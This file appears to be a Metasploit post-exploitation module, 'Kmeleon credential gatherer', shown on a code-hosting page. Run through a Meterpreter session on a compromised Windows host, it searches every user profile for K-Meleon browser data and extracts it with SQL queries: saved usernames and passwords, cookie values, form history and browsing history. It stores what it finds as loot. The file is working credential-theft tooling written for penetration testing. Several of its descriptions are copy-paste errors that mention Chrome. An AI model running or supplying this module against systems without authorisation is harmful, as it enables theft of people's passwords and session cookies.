Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7

8
  # this associative array defines the artifacts known to PackRat
9
  include Msf::Post::File
10
  include Msf::Post::Windows::UserProfiles
11
  include Msf::Post::Windows::Packrat
12

13
  ARTIFACTS =
14
    {
15
      application: 'k-meleon',
16
      app_category: 'browsers',
17
      gatherable_artifacts: [
18
        {
19
          filetypes: 'logins',
20
          path: 'AppData',
21
          dir: 'K-Meleon',
22
          artifact_file_name: 'signons.sqlite',
23
          description: "K-Meleon's saved Username and Passwords",
24
          credential_type: 'sqlite',
25
          sql_search: [
26
            {
27
              sql_description: "Database Commands which exports Chrome's Login data",
28
              sql_table: 'logins',
29
              sql_column: 'username_value, action_url'
30
            }
31
          ]
32
        },
33
        {
34
          filetypes: 'logins',
35
          path: 'AppData',
36
          dir: 'K-Meleon',
37
          artifact_file_name: 'cert8.db',
38
          description: "K-Melon's saved Username and Passwords",
39
          credential_type: 'database'
40
        },
41
        {
42
          filetypes: 'cookies',
43
          path: 'AppData',
44
          dir: 'K-Meleon',
45
          artifact_file_name: 'cookies.sqlite',
46
          description: "K-Meleon's Cookies",
47
          credential_type: 'sqlite',
48
          sql_search: [
49
            {
50
              sql_description: "Database Commands which exports Chrome's Login data",
51
              sql_table: 'moz_cookies',
52
              sql_column: 'baseDomain, host, name, path, value'
53
            }
54
          ]
55
        },
56
        {
57
          filetypes: 'web_history',
58
          path: 'AppData',
59
          dir: 'K-Meleon',
60
          artifact_file_name: 'formhistory.sqlite',
61
          description: "K-Meleon's Visited websites ",
62
          credential_type: 'sqlite',
63
          sql_search: [
64
            {
65
              sql_description: "Database Commands which exports Chrome's Login data",
66
              sql_table: 'moz_formhistory',
67
              sql_column: 'value'
68
            }
69
          ]
70
        },
71
        {
72
          filetypes: 'web_history',
73
          path: 'AppData',
74
          dir: 'K-Meleon',
75
          artifact_file_name: 'places.sqlite',
76
          description: "K-Meleon's Visited websites ",
77
          credential_type: 'sqlite',
78
          sql_search: [
79
            {
80
              sql_description: "Database Commands which exports Chrome's Login data",
81
              sql_table: 'moz_places',
82
              sql_column: 'url'
83
            },
84
            {
85
              sql_description: "Database Commands which exports Chrome's Login data",
86
              sql_table: 'moz_inputhistory',
87
              sql_column: 'input'
88
            },
89
            {
90
              sql_description: "Database Commands which exports Chrome's Login data",
91
              sql_table: 'moz_hosts',
92
              sql_column: 'host'
93
            },
94
            {
95
              sql_description: "Database Commands which exports Chrome's Login data",
96
              sql_table: 'moz_keywords',
97
              sql_column: 'keyword'
98
            }
99
          ]
100
        }
101
      ]
102
    }.freeze
103

104
  def initialize(info = {})
105
    super(
106
      update_info(
107
        info,
108
        'Name' => 'Kmeleon credential gatherer',
109
        'Description' => %q{
110
          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
111
          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
112
          Further details can be found in the module documentation.
113
          This is a module that searches for K-meleon credentials on a windows remote host.
114
        },
115
        'License' => MSF_LICENSE,
116
        'Author' => [
117
          'Kazuyoshi Maruta',
118
          'Daniel Hallsworth',
119
          'Barwar Salim M',
120
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
121
        ],
122
        'Platform' => ['win'],
123
        'SessionTypes' => ['meterpreter'],
124
        'Notes' => {
125
          'Stability' => [CRASH_SAFE],
126
          'Reliability' => [],
127
          'SideEffects' => []
128
        }
129
      )
130
    )
131

132
    register_options(
133
      [
134
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
135
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
136
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
137
        # enumerates the options based on the artifacts that are defined below
138
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
139
      ]
140
    )
141
  end
142

143
  def run
144
    print_status('Filtering based on these selections:  ')
145
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
146
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
147
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
148

149
    # used to grab files for each user on the remote host
150
    grab_user_profiles.each do |userprofile|
151
      run_packrat(userprofile, ARTIFACTS)
152
    end
153

154
    print_status 'PackRat credential sweep Completed'
155
  end
156
end
157

158